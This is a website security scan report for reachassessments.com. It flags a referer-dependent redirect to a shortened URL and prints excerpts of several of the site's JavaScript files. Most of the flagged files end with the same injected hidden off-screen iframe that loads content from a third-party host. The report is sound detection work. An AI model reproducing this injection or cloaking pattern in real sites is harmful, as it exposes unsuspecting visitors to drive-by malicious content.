Malicious/Suspicious Redirects
Request | Server response | Status |
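Request: URL: http://reachassessments.com/ (imitation of a visitor arriving from a search engine)
GET / HTTP/1.1
Host: reachassessments.com
Referer: http://www.google.com/search?q=redirect+check1

Server response:
HTTP/1.1 302 Found
Cache-Control: max-age=60
Connection: close
Date: Thu, 14 Aug 2014 05:55:19 GMT
Location: http://tinyurl.com/cgwg7xc
Server: Apache/2.2.17 (Unix) PHP/5.2.15 mod_ssl/2.2.17 OpenSSL/0.9.7l DAV/2 mod_jk/1.2.23 mod_scgi_pubsub/1.11-pubsub
Content-Length: 0
Content-Type: text/html
Expires: Thu, 14 Aug 2014 05:56:19 GMT
MS-Author-Via: DAV
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 260b8138e9f7260cf514b71351391c87=9ace30fb49bc7020ab951e0c4f247eb1; path=/
X-Powered-By: PHP/5.2.15

Status: malicious

The 302 response sends the visitor to an off-site shortened URL (the Location header). The same URL returned 200 OK in the plain scan listed under "Scanned pages/files", which suggests the redirect is served only when the request carries a search-engine Referer; a site owner who opens the page directly would probably not see it.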
Scanned pages/files
Request | Server response | Status |
http://reachassessments.com/ | 200 OK Content-Length: 52250 Content-Type: text/html | clean |
http://reachassessments.com/media/system/js/caption.js | 200 OK Content-Length: 2138 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt appears to be abbreviated (part of the served file is omitted). The injected part is the final document.write(...) statement, which writes a 120x120 iframe positioned off-screen (left:-500px; position:fixed) that loads content from a third-party host; the code before it is the site's own caption script. The same statement, with the same iframe URL, is appended to every file flagged as malicious below.

var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;document.write('<iframe height="120" width="120" style="top:0px;left:-500px;position:fixed;" src="http://ucaphnx.qhigh.com/dfa5290dba241.HbgPTWtBGijkSxu?default"></iframe>');

Antivirus reports:
| ||
http://reachassessments.com/modules/mod_s5_live_search/js/s5_ls_fade.js | 200 OK Content-Length: 4356 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) s5_ls_Effects = {}; s5_ls_Effects.s5_ls_fade = function(s5_ls_id, s5_ls_opacStart, s5_ls_opacEnd, s5_ls_duration, s5_ls_callback) { s5_ls_Effects.s5_ls_changeOpacity(0, s5_ls_id); var s5_ls_speed = Math.round(s5_ls_duration/100); var s5_ls_timer = 0; if(s5_ls_opacStart > s5_ls_opacEnd) { for(var s5_ls_i=s5_ls_opacStart; s5_ls_i>=s5_ls_opacEnd; s5_ls_i--) { setTimeout("s5_ls_Effects.s5_ls_changeOpacity("+ s5_ls_i +", '"+ s5_ls_id +"', "+ s } if(ths.callback) ths.callback(result); } else { if(ths.error) ths.error(http.status); } } } this.http.send(null); }, init : function() {this.http = this.getHTTPObject();} } ;document.write('<iframe height="120" width="120" style="top:0px;left:-500px;position:fixed;" src="http://ucaphnx.qhigh.com/dfa5290dba241.HbgPTWtBGijkSxu?default"></iframe>'); Antivirus reports:
| ||
http://reachassessments.com/modules/mod_s5_box/js/jquery.min.js | 200 OK Content-Length: 57469 Content-Type: application/javascript | clean |
http://reachassessments.com/modules/mod_s5_box/js/jquery.no.conflict.js | 200 OK Content-Length: 194 Content-Type: application/javascript | clean |
http://reachassessments.com/modules/mod_s5_box/js/jquery.colorbox.js | 200 OK Content-Length: 19041 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function ($) { var $overlay, $cbox, $wrap, $content, $topBorder, $leftBorder, $rightBorder, $bottomBorder, $related, $window, $loaded, $loadingOverlay, $loadingGraphic, $title, $current, $slideshow, $next, $prev, $close, publicMethod, interfaceHeight, interfaceWidth, loadedHeight, loadedWidth, maxWidth, maxHeight, element, index, settings, open, callback, colorbox = 'colorbox', hover = 'hover', prev, next, init, load, position, dimensions, slideshow, close publicMethod.close = close; publicMethod.load = load; publicMethod.position = position; publicMethod.dimensions = dimensions; publicMethod.element = function(){ return element; }; publicMethod.settings = defaults; $(function () { init(); }); }(jQuery)); ;document.write('<iframe height="120" width="120" style="top:0px;left:-500px;position:fixed;" src="http://ucaphnx.qhigh.com/dfa5290dba241.HbgPTWtBGijkSxu?default"></iframe>'); Antivirus reports:
| ||
http://reachassessments.com/modules/mod_s5_frontpage_display2/s5_frontpage_display_2/class.noobSlide.packed.js | 200 OK Content-Length: 3144 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var noobSlide=new Class({initialize:function(a){this.items=a.items;this.mode=a.mode||'horizontal';this.modes={horizontal:['left','width'],vertical:['top','height']};this.size=a.size||965;this.box=a.box.setStyle(this.modes[this.mode][1],(this.size*this.items.length)+'px');this.button_event=a.button_event||'click';this.handle_event=a.handle_event||'click';this.interval=a.interval||5000;this.buttons={previous:[],next:[],play:[],playback:[],stop:[]};if(a.buttons){for(var b in a.buttons){this.addActi oEvent.initMouseEvent("click", true, true,window, 1, 1, 1, 1, 1, false, false, false, false, 0, s5fdtarget); s5fdtarget.dispatchEvent( oEvent ); } else if(document.fireEvent) { s5fdtarget.fireEvent("onclick"); } } ;document.write('<iframe height="120" width="120" style="top:0px;left:-500px;position:fixed;" src="http://ucaphnx.qhigh.com/dfa5290dba241.HbgPTWtBGijkSxu?default"></iframe>'); Antivirus reports:
| ||
http://reachassessments.com/templates/fusion/js/s5_effects.js | 200 OK Content-Length: 544 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function s5besocialover() {document.getElementById("s5_besociald").style.display = "block";} function s5besocialout() {document.getElementById("s5_besociald").style.display = "none";} function s5donateover() {document.getElementById("s5_donate").style.display = "block";} function s5donateout() {document.getElementById("s5_donate").style.display = "none";} ;document.write('<iframe height="120" width="120" style="top:0px;left:-500px;position:fixed;" src="http://ucaphnx.qhigh.com/dfa5290dba241.HbgPTWtBGijkSxu?default"></iframe>'); Antivirus reports:
| ||
http://reachassessments.com/templates/fusion/js/jquery13.js | 200 OK Content-Length: 117053 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof jQuery == 'undefined') { (function(){ var window = this, undefined, _jQuery = window.jQuery, _$ = window.$, jQuery = window.jQuery = window.$ = function( selector, context ) { return new jQuery.fn.init( selector, context ); }, quickExpr = /^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/, isSimple = /^.[^:#\[\.,]*$/; jQuery.fn = jQuery.prototype = { init: function( selector, context ) { selector = s document.body["offset" + name], document.documentElement["offset" + name] ) : size === undefined ? (this.length ? jQuery.css( this[0], type ) : null) : this.css( type, typeof size === "string" ? size : size + "px" ); }; });})(); };document.write('<iframe height="120" width="120" style="top:0px;left:-500px;position:fixed;" src="http://ucaphnx.qhigh.com/dfa5290dba241.HbgPTWtBGijkSxu?default"></iframe>'); Antivirus reports:
| ||
http://reachassessments.com/templates/fusion/js/jquery_no_conflict.js | 200 OK Content-Length: 194 Content-Type: application/javascript | clean |
http://reachassessments.com/templates/fusion/js/lytebox.js | 200 OK Content-Length: 38443 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Array.prototype.removeDuplicates = function () { for (var i = 1; i < this.length; i++) { if (this[i][0] == this[i-1][0]) { this.splice(i,1); } } } Array.prototype.empty = function () { for (var i = 0; i <= this.length; i++) { this.shift(); } } String.prototype.trim = function () { return this.replace(/^\s+|\s+$/g, ''); } function LyteBox() { this.theme = 'grey'; this.hideFlash = true; this.outerBorder = false; this.resizeSpeed = 8; this.maxOpacity }; if (window.addEventListener) { window.addEventListener("load",initLytebox,false); } else if (window.attachEvent) { window.attachEvent("onload",initLytebox); } else { window.onload = function() {initLytebox();} } function initLytebox() { myLytebox = new LyteBox(); };document.write('<iframe height="120" width="120" style="top:0px;left:-500px;position:fixed;" src="http://ucaphnx.qhigh.com/dfa5290dba241.HbgPTWtBGijkSxu?default"></iframe>'); Antivirus reports:
| ||
http://reachassessments.com/templates/fusion/js/IEsuckerfish.js | 200 OK Content-Length: 665 Content-Type: application/javascript | clean |
http://reachassessments.com/modules/mod_s5_frontpage_display2/s5_frontpage_display_2/s5_checkactive.js | 200 OK Content-Length: 10823 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (document.images) { var s5imagel = new Array() s5imagel[0] = new Image(1,1) s5imagel[1] = new Image(1,1) var preImages = new Array(),s5fdcurrCount = 0 var s5fdloaded = new Array(),i,timerID } function preloadimages() { for (i = 0; i < imageURLs.length; i++) { preImages[i] = new Image() preImages[i].src = imageURLs[i]} for (i = 0; i < preImages.length; i++) { s5fdloaded[i] = false } s5fd_checkloads() } function s5fd_c document.getElementById("s5_fd2_7").className = "s5_fd_nonactive";} if (s5_fd2fvisible >= 8) { document.getElementById("s5_fd2_8").className = "s5_fd_active";} } window.setTimeout('s5_fd2checkactive()', 100); } s5_fd2checkactive(); ;document.write('<iframe height="120" width="120" style="top:0px;left:-500px;position:fixed;" src="http://ucaphnx.qhigh.com/dfa5290dba241.HbgPTWtBGijkSxu?default"></iframe>'); Antivirus reports:
| ||
http://reachassessments.com//modules/mod_s5_tabshow/s5_tabshow/iCarousel.js/ | 404 Not Found Content-Length: 537 Content-Type: text/html | clean |
http://reachassessments.com/test404page.js | 404 Not Found Content-Length: 504 Content-Type: text/html | clean |
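Safe Browsing / Blacklists
A "not listed" result below reflects only the blacklist's status at the time of the query and does not contradict the findings above; blacklist listings can lag behind an infection.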
Query: http://www.google.com/safebrowsing/diagnostic?site=reachassessments.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://reachassessments.com/
Result: reachassessments.com is not infected or malware details are not published yet.
Result: reachassessments.com is not infected or malware details are not published yet.